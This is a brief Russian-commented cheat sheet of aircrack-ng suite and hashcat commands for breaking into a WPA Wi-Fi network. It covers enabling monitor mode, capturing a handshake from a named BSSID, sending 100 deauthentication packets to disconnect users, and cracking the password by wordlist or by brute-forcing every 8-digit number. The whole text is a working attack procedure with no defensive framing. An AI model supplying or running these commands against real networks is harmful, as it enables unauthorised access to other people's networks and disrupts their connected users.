airmon-ng start wlan0 --стартуем аирмон

kill --убиваем все необходимые процессы

airodump-ng mon0 --выводим список всех доступных вай фай 

airodump-ng --bssid 08:86:30:74:22:76 -c 6 -w WPAcrack mon0 --для получения хендшейка (выбираем мак и канал, придумывает название)

aireplay-ng --deauth 100 -a 08:86:30:74:22:76 mon0 --отключаем пользователей вай фай (по мак адресу)

--------------------------------------------
aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0de --подбираем пароль
--------------------------------------------

--Очистка ваших файлов .cap программой wpaclean
wpaclean <out.cap> <in.cap>

--Конвертация файлов .cap в формат .22000
hcxpcapngtool -o TEST.22000 -E elist NewMts.cap 

--запускаем бруфорс пароля по всем 8 значным цифрам
hashcat -m 22000 -a 3 NewMts.22000 ?d?d?d?d?d?d?d?d

--------------------------------------------
